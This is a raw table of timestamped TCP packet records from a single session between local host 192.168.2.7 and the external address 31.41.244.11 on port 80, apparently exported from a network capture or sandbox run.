Dec 13, 2024 18:53:37.766058922 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.766114950 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.766206026 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.766254902 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.768619061 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.768659115 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.768668890 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.768706083 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.771070004 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.771126032 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.771187067 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.771226883 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.773552895 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.773605108 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.773647070 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.773689032 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.776029110 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.776078939 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.776128054 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.776175022 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.778634071 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.778683901 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.778773069 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.778816938 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.781023979 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.781076908 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.781120062 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.781168938 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.783657074 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.783706903 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.783708096 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.783757925 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.786089897 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.786149025 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.786288023 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.786330938 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.788598061 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.788655996 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.788702965 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.788753033 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.790465117 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.790517092 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.790597916 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.790643930 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.792346001 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.792397022 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.792442083 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.792481899 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.794275045 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.794361115 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.794361115 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.794414997 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.795875072 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.795928001 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.795998096 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.796045065 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.797693968 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.797754049 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.797761917 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.797807932 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.799539089 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.799592972 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.799658060 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.799705982 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.801337004 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.801393032 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.801477909 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.801527023 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.803282022 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.803350925 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.803356886 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.803402901 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.804965973 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.805016994 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.805097103 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.805145025 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.806808949 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.806865931 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.806941986 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.806993961 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.808681011 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.808733940 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.808760881 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.808804989 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.810554981 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.810606956 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.811002970 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.811049938 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.812252998 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.812314034 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.812338114 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.812422991 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.814109087 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.814172029 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.814218044 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.814260006 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.815913916 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.815984011 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.815994978 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.816037893 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.817804098 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.817876101 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.817877054 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.817939997 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.819710970 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.819758892 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.933178902 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.933306932 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.933413982 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.933464050 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.933943987 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.934000969 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.934061050 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.934106112 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.935178041 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.935226917 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.935282946 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.935334921 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.936656952 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.936705112 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.936762094 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.936806917 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.938052893 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.938107014 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.938168049 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.938211918 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.939512968 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.939575911 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.939646959 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.939692020 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.940993071 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.941047907 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.941103935 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.941148043 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.942409992 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.942481041 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.942533970 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.942578077 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.943861008 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.943909883 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.943980932 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.944017887 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.945286989 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.945326090 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.945528984 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.945693016 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.946741104 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.946785927 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.946815968 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.946856022 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.948177099 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.948230982 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.948240042 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.948282003 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.949551105 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.949599028 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.949670076 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.949709892 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.951150894 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.951203108 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.951244116 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.951286077 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.952425957 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.952475071 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.952502966 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.952544928 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.953783989 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.953835011 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.953901052 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.953943014 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.955221891 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.955267906 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.955351114 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.955405951 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.956645012 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.956693888 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.956826925 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.956871986 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.958066940 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.958127022 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.958280087 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.958324909 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.959541082 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.959625006 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.959626913 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.959682941 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.960966110 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.961023092 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.961026907 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.961066961 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.962414980 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.962465048 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.962512970 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.962553024 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.963824987 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.963876009 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.963927031 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.964090109 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.965305090 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.965354919 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.965533018 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.965576887 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.966767073 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.966819048 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.966861963 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.966908932 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.968239069 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.968274117 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.968297958 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.968343019 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.969522953 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.969572067 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.969594002 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.969647884 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.971163034 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.971210003 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.971246958 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.971291065 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.972366095 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.972414017 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.972471952 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.972532988 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.973844051 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.973893881 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.973970890 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.974044085 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.975182056 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.975229979 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.975330114 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.975374937 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.976675987 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.976739883 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.976797104 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.976839066 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.978084087 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.978132963 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.978195906 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.978245974 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.979825020 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.979880095 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.979902029 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.979937077 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.981280088 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.981326103 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.981385946 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.981426001 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.982820034 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.982861996 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.983150959 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.983187914 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.984101057 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.984143019 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.984180927 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.984215021 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.985378027 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.985434055 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.985510111 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.985543966 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.986722946 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.986772060 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.986866951 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.986905098 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.988037109 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.988080978 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.988118887 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.988158941 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.989444971 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.989485979 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.989559889 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.989595890 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.990876913 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.990935087 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.990999937 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.991039991 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.992273092 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.992328882 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.992413044 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.992459059 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.993745089 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.993798018 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.993889093 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.993932009 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.995253086 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.995311022 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.995362997 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.995405912 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.996598005 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.996648073 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.996700048 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.996741056 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.998023987 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.998075962 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.998120070 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.998161077 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.999655962 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.999701023 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.999707937 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.999743938 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.000847101 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.000897884 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.000941038 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.000981092 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.002327919 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.002373934 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.002397060 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.002435923 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.003722906 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.003770113 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.003810883 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.003854036 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.005148888 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.005192041 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.005278111 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.005326033 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.006537914 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.006598949 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.006700039 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.006742001 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.125837088 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.125957966 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.126048088 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.126094103 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.126512051 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.126559019 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.126627922 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.126671076 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.127827883 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.127871990 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.127975941 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.128019094 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.129013062 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.129060030 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.129221916 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.129265070 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.130280972 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.130320072 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.130347967 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.130386114 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.131467104 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.131510973 CET	49877	80	192.168.2.7	31.41.244.11
